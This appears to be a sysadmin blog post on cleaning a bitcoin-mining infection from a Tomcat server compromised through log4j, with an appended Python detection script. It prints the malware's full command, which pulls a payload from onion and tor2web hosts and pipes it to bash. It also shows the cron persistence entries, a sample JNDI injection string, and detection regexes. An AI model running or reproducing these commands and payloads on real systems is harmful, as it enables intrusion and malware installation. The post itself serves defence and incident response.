Malware Running Bash Process Communicating With Tor2web Sites
If you see processes like the following running on your server, it is most likely infected with bitcoin-mining malware.
$ ps -ef
...
tomcat 1710 1695 0 11:21 ? 00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat 1725 1710 0 11:21 ? 00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat 1727 1725 0 11:21 ? 00:00:00 curl https://doh.centraleu.pi-dns.com/dns-query?name=relay.l33t-ppl.info
tomcat 1728 1725 0 11:21 ? 00:00:00 grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b
tomcat 1729 1725 0 11:21 ? 00:00:00 tr \n
tomcat 1730 1725 0 11:21 ? 00:00:00 sort -uR
tomcat 1731 1725 0 11:21 ? 00:00:00 head -1
How did they get into the server?
There are several possibilities; in recent days, however, the major cause has been the log4j2 security issue.
e.g. if you log the username during login as follows
log.debug("Username : {}", username)
and the hacker enters the username ${jndi:ldap://attackerserver.com.com/x},
then the log4j process treats it as a JNDI lookup instead of logging it as a string. Yeah :-)
Hackers use this JNDI lookup to point at their own server, download scripts and the like, and run them on your server. They are also smart enough to set their scripts to start at system startup.
How to clean this up?
If you are running the server in the cloud, e.g. AWS or Google, it is better to relaunch a new instance from a previous image that wasn’t infected.
If you can’t do that for whatever reason, you may try the following approach to clean up.
Check and clean up the startup process
Check which user is running the above-mentioned processes and switch to that user. In the example above the processes were running as tomcat, so switch user as follows.
$ sudo su tomcat
Check that user’s crontab for the startup entries
$ crontab -e
It will probably show the following (in addition to any entries you configured yourself)
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=''
HOME=/
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
* * * * * /var/lock/pty3 > /dev/null 2>&1 &
* * * * * n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is
Remove all of these entries.
In the application user’s directories, check whether any new files have been created, e.g. in the tomcat bin, logs and other directories, and delete them if you are sure they are not part of the application and they look suspicious. (Take care not to delete any application or OS-specific files.)
Restart your server; you should no longer see those bash processes.
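A small triage script, added here as an example and not part of the original post, that runs the indicators visible in the process listing and crontab above (onion hosts reached via tor2web gateways, the Tor SOCKS port, DNS-over-HTTPS lookups, curl output piped into bash, every-minute cron jobs in /tmp, /dev/shm or /var/lock) over constructed `ps -ef` and crontab samples. The hostnames and the sixteen-x onion address in the samples are placeholders, not values from the page.

```python
import re

# Indicator regexes derived from the process listing and crontab shown above.
# Constructed for this example; tune them to your own environment.
INDICATORS = [
    # onion host reached directly or via a tor2web gateway (onion.ly, onion.ws, tor2web.*)
    ("tor2web_proxy",   re.compile(r"\b[a-z2-7]{16,56}\.(?:onion(?:\.\w+)?|tor2web\.\w+)\b")),
    ("socks5_tor_port", re.compile(r"socks5h?://[^ ]+:9050")),
    # DNS-over-HTTPS lookup from an application user; weak on its own, strong with the others
    ("doh_resolve",     re.compile(r"https://[^ /]+/dns-query\?name=")),
    ("pipe_to_bash",    re.compile(r"\)\s*\|\s*bash\b|curl[^|]*\|\s*bash\b")),
    # cron job (five schedule fields) running a binary dropped in a world-writable directory
    ("cron_dropper",    re.compile(r"^(?:\S+\s+){5}/(?:tmp|dev/shm|var/lock)/\S+")),
]

def scan_line(line):
    """Return the indicator names matched by one command line or crontab entry."""
    return [name for name, rx in INDICATORS if rx.search(line)]

def scan_ps(ps_output):
    """Parse `ps -ef` output; return (user, pid, indicators) for each suspicious process."""
    findings = []
    for line in ps_output.splitlines():
        cols = line.split(None, 7)          # UID PID PPID C STIME TTY TIME CMD
        if len(cols) < 8 or cols[1] == "PID":
            continue
        hits = scan_line(cols[7])
        if hits:
            findings.append((cols[0], int(cols[1]), hits))
    return findings

def scan_crontab(crontab_text):
    """Return crontab entries that match any indicator."""
    return [entry for entry in crontab_text.splitlines() if scan_line(entry)]

# Constructed sample input; the sixteen x's stand in for an onion address (placeholder).
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 11:00 ?        00:00:01 /sbin/init
tomcat    1695     1  0 11:02 ?        00:00:09 /usr/bin/java -jar app.war
tomcat    1710  1695  0 11:21 ?        00:00:00 /bin/bash -c s=$(curl https://doh.example/dns-query?name=relay.example | grep -oE "[0-9.]+" | head -1);(curl -x socks5h://$s:9050 xxxxxxxxxxxxxxxx.onion/src/ldm || curl -fsSLk https://xxxxxxxxxxxxxxxx.tor2web.su/src/ldm)|bash
tomcat    1727  1725  0 11:21 ?        00:00:00 curl https://doh.example/dns-query?name=relay.example
"""
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
0 3 * * * /opt/app/bin/rotate-logs.sh
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
"""
```

On a live host, feed it `subprocess.check_output(["ps", "-ef"], text=True)` and the output of `crontab -l` for each application user, and treat any process matching two or more indicators as the one to investigate first.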